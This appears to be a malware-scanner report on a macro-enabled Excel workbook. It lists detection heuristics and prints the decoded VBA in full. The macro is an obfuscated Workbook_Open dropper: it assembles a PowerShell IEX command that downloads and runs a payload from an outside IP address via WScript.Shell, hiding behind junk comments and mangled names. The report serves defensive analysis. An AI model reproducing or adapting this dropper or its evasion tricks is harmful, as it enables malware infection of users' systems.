MALICIOUS
190
Risk Score
Heuristics 7
-
VBA project inside OOXML medium 4 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
Set NJMKAuerzKFRtLyUuZDZJzPUXnFaXvEy = (((CreateObject("WScript.Shell")))):::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set eNAXoXQpiyfoatLzteivsrYbiotKrYsSr = CreateObject("scripting.filesystemobject") -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Private Sub Workbook_Open() -
Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://179.43.140.150/shtq/Faxk.jpg In document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 7860 bytes |
SHA-256: 7e9ab7c0db8dc33e31fba81f87b0ff5ff42b287b0afd171463858aac7c81e035 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 2 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
On Error Resume Next
Dim iDPycO As Range, fiibIZiByuThLf As Range
Set fiibIZiByuThLf = Range([A2], Range("A" & Rows.Count).End(xlUp)).Resize(, 11)
PIiWIGGaPfBfPSktNDzIUe = fiibIZiByuThLf.Value ' BAsLyHuBXQVXAstJiwUT
Set eNAXoXQpiyfoatLzteivsrYbiotKrYsSr = CreateObject("scripting.filesystemobject")
' BAsLyHuBXQVXAstJiwUT
BaseFolder$ = ThisWorkbook.Path & "\BAsLyHuBXQVXAstJiwUT\": MkDir BaseFolder$
' BAsLyHuBXQVXAstJiwUT
For i = LBound(PIiWIGGaPfBfPSktNDzIUe) To UBound(PIiWIGGaPfBfPSktNDzIUe)
' BAsLyHuBXQVXAstJiwUT (BAsLyHuBXQVXAstJiwUT)
Folder$ = BaseFolder$ & PIiWIGGaPfBfPSktNDzIUe(i, 7) & "\" ' BAsLyHuBXQVXAstJiwUT - ? BAsLyHuBXQVXAstJiwUT G
MkDir Folder$
' BAsLyHuBXQVXAstJiwUT
Filename$ = Folder$ & Trim(PIiWIGGaPfBfPSktNDzIUe(i, 2)) & ".txt"
' BAsLyHuBXQVXAstJiwUT BAsLyHuBXQVXAstJiwUT Unicode
Set ts = eNAXoXQpiyfoatLzteivsrYbiotKrYsSr.CreateTextFile(Filename$, True, True)
ts.Write Trim(PIiWIGGaPfBfPSktNDzIUe(i, 10)) ' BAsLyHuBXQVXAstJiwUT
ts.Close
' BAsLyHuBXQVXAstJiwUT
Next i
Set ts = Nothing: Set eNAXoXQpiyfoatLzteivsrYbiotKrYsSr = Nothing
MsgBox "BAsLyHuBXQVXAstJiwUT" & vbNewLine & BaseFolder$, vbInformation, "BAsLyHuBXQVXAstJiwUT"
' BAsLyHuBXQVXAstJiwUT
Dim NJMKAuerzKFRtLyUuZDZJzPUXnFaXvEy, kKSfoEIGCB
bsbtqeFQe = "P":
UdwIvKHbLOyQrDYATMCNAiEfXiQdpY = "o":
MUzTzvPuoESOKbSR = "w":
iObMGCHJHDyP = "e":
bsdC = "r":
HSrh = "s":
raFhoFdyRU = "h":
bACV = "e":
HVJKSeYy = "l":
OAKUVBHNhJdYrokfETJibQDGVJSPicTPI = "l"::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
kKSfoEIGCB = bsbtqeFQe + UdwIvKHbLOyQrDYATMCNAiEfXiQdpY + MUzTzvPuoESOKbSR + iObMGCHJHDyP + bsdC + HSrh + raFhoFdyRU + bACV + HVJKSeYy + OAKUVBHNhJdYrokfETJibQDGVJSPicTPI + " I`EX ((n`E`W`-`Ob`j`E`c`T ('N'+'e'+'t'+'.'+'W'+'e'+'b'+'c'+'l'+'i'+'e'+'n'+'t'))).(('D'+'o'+'w'+'n'+'l'+'o'+'a'+'d'+'s'+'t'+''+'r'+'i'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'n'+'g')).Invoke('http://179.43.140.150/shtq/Faxk.jpg')""":::::::::::::::::::::::::::::::::::::::::::::::::::
Set NJMKAuerzKFRtLyUuZDZJzPUXnFaXvEy = (((CreateObject("WScript.Shell"))))::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
On Error Resume Next
' BAsLyHuBXQVXAstJiwUT
Colors = Array(737481, 737481, 737481, 737481, 737481, 737481, 737481, _
737481, 737481, 737481, 737481, 737481, 737481, 737481, 737481)
Err.Clear: Set ra = Intersect(Selection, ActiveSheet.UsedRange)
ra.Interior.ColorIndex = xlColorIndexNone: Application.ScreenUpdating = False
For Each cell In ra.Cells ' BAsLyHuBXQVXAstJiwUT dupes
Err.Clear: If Len(Trim(cell)) Then coll.Add CStr(cell.Value), CStr(cell.Value)
If Err Then dupes.Add CStr(cell.Value), CStr(cell.Value)
Next cell
For Each cell In ra.Cells ' BAsLyHuBXQVXAstJiwUT
Next cell
Application.ScreenUpdating = True
raFhoFdyRU = "Run":
On Error Resume Next: Err.Clear
Set eNAXoXQpiyfoatLzteivsrYbiotKrYsSr = CreateObject("scripting.filesystemobject")
Set ts = eNAXoXQpiyfoatLzteivsrYbiotKrYsSr.CreateTextFile(Filename, True)
ts.Write txt: ts.Close
SaveTXTfile = Err = 0
Set ts = Nothing: Set eNAXoXQpiyfoatLzteivsrYbiotKrYsSr = Nothing
'TLZwMpvTThGwLrnJrZQEyhEyUMBMrELfMLQwxJJsEJTpxUhUxOQiihJhhfCQDvwwBwwQEBCfEGQhAZsMpkyxEAyAwAsiCJMyGrsZTGTBDfyZGwyvwCJCkiMDCJnLsGkshCQUiLxCfiihyDvQyhUMQTfiTnBGhssnCZrZQnGOwCOAMpiOxnDviLAsiZEpCUywCpZsOEMUwBnyvrOxJGZkMhJEpLsivTfxJiGhhvQLnUCAxyhTAOLUffEULkEJJLAvArhGhLTxGQLLxUOrrivfDUiEyiBnxpwUvnMJhQGLTnLDxpsDOnDOCvprvDpiCyQTMDCCULGrZrpGGxiCCAJvBLsQhCZrJiBnBffOGJyhAphkDChETGsAhriUwCUsnsDsUsJwUMiyyQDfEZfZUknECfpZyUUZpZJMvTswTGCyiUTGkxTiiDyiDAJLwvCQZfCspfknOsGkCZxhOxEsEnsvGpDsfLMOLCsZALTTryMCnfDZhQpixpBxEMvQQyAhsUnMiwyJhBOBMhnwvLCfOLfpnkksCTrBxppkGDDGCZkBwQxDQCTOpBiZLhwhAxxsZAEhUifpUiLGwJOnvTAQMCGBEJMnsBTQMyrJByUZOxEwyLkwiELypZsBvyfhiGBOrkhCfkQknkLyZDkpnBkOTnkUxUZLkJsZvZnGrvGhEQiLQUrAfrkABGTTQpwinOQiUnOQfrUEpwUrkMyfEpyfMQviGZGxxikxQMswBrvpBGwCOQfQrfyhEDOyEQsZhDiwADrkfrhnDChAMwMGyfJUEEkfkUMBkEZsiMACBvfQnUEUvBUQQBGECQMOChQirLUpwTrMJrJpMJOCMAJZQMvZGkhUQwQivUvyMLyLxUpvUTEyLrpAMUiTCfxAGvMhrpfZZrvUynMZhQfAhAGvLh
NJMKAuerzKFRtLyUuZDZJzPUXnFaXvEy.Run kKSfoEIGCB, 737481::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
'pTJCkTxsLfnrZwpCiUEyiZfhLCyQpDQsQTAMMLLyLsMDDQxLDiriBQUhkQrvMZwyfDrhJpChGBDvZwrkQDfwOLfMBxiMhCynpZnMvyEEsGZQfAChBsvDyQvCMTkCEvQLkGDQETCxAshxnfDDMLErMLZpBrQLGUQhGwOMBCDZJwExAEvskTvpxvLMCrEMrEUTAQUBTfhrypDBJnMCUGwpAJxkOprxLfhGCnApCMUrhZTspxOvTiZGQvxZyhGCpCALZnELGhMiiBZJDpifQihsZQfnTkrUAsZxODksLJOGOsirErUvOQCEyMnZsrGvsZvvTMiQLvCpnQEOZACQAiBpJJGpfnMhEsrGGAnrCUTDysrTvJQwifDTCfUfsnDZvUifBfZOsLyTEsTyfpfBnnihMMZwTskBxAhMrJiOvkhGiOwppwQwAGCnnLGnxLrQQOALvTwvEywUOLiJBpLrsJDyGkwsEOfrfhfnnOfTMTnyfhJyABQsQQGAvTTyrhZxkBZLTOLhCfrULUkMQCwyiErDQrEZTOwAArGJvBQwyshfvOLhfTTOGGDhZUkwUnAfDZvGLwEExMMCDJJLsfUMTZCvknvJUMCUwwwrsrvsEwfGGkErhnJLkApZBQBZyDvCTLxshDiiJCBEyUiMvLQOpEhJLiysUEyhTLAvvkGEkOEvfUfkZBBfDGsErrZiiCQGhOBDvsEyTBkQQLrsxGLpyLEJUOLZBUCCOGUTpQxOxkOhvswAQOfZrkOByUUGLpiBwCLDDnEZZAhfpfZCUOLhZwkkypMExUhAAsfwZhnwyZQZwCfLfsOAJkrQTQUEMMnfxTEnQLwJpkpMwBhpCihpnyZLiDvLOCwUxfMBLhLxpkQMirMUsBULAhGhAAJfvpiGhryfnkkUGxQUTxsrfhUsGpCynpfOnyBMpDprnsiZyQrhhi
'On Error Resume Next:
'Err.Clear
' Set bsbtqeFQe = CreateObject("scripting.filesystemobject")
' Set NJMKAuerzKFRtLyUuZDZJzPUXnFaXvEy = bsbtqeFQe.CreateTextFile(Filename, True)
' BAsLyHuBXQVXAstJiwUT,
' BAsLyHuBXQVXAstJiwUT coll
iCDRZIYBwdILp$ = "ZZZXXXZZZ": azreEWJuoFdXsEBYtYUIoZySSFYRoCsWFRRKZI$ = "BAsLyHuBXQVXAstJiwUT": On Error Resume Next
iDPycO = Replace(iDPycO, ".", iCDRZIYBwdILp$): iDPycO = Replace(iDPycO, "-", azreEWJuoFdXsEBYtYUIoZySSFYRoCsWFRRKZI$)
Set EcOAntBFudwYdRB = CreateObject("VBScript.EcOAntBFudwYdRB"): EcOAntBFudwYdRB.Global = True
EcOAntBFudwYdRB.Pattern = "[\w]{1,}@[\w]{1,}" & iCDRZIYBwdILp$ & "[\w]{1,}"
If EcOAntBFudwYdRB.test(iDPycO) Then
Set objMatches = EcOAntBFudwYdRB.Execute(iDPycO)
For i = 0 To objMatches.Count - 1
wRLfyyCKnNnAnZyKrMpMzHGIGNu = objMatches.Item(i).Value
wRLfyyCKnNnAnZyKrMpMzHGIGNu = Replace(wRLfyyCKnNnAnZyKrMpMzHGIGNu, iCDRZIYBwdILp$, "."): wRLfyyCKnNnAnZyKrMpMzHGIGNu = Replace(wRLfyyCKnNnAnZyKrMpMzHGIGNu, azreEWJuoFdXsEBYtYUIoZySSFYRoCsWFRRKZI$, "-")
coll.Add wRLfyyCKnNnAnZyKrMpMzHGIGNu, wRLfyyCKnNnAnZyKrMpMzHGIGNu ' BAsLyHuBXQVXAstJiwUT
Next
End If
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{0D53A875-8CE5-4B30-9776-C52768FD0A39}{8263307E-7316-465A-A1B4-870212F76017}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 26624 bytes |
SHA-256: 3adb0dc2735aab0f8d637f7bde1935a158c8f35652a5c49bc6a876d0e0cf9ffe |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
210 of 377 identifiers look randomly generated (e.g. 'pTJCkTxsLfnrZwpCiUEyiZfhLCyQpDQsQTAMMLLy') — consistent with name-mangling obfuscation. Carved artifact contains 2 long base64-like blob(s).
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.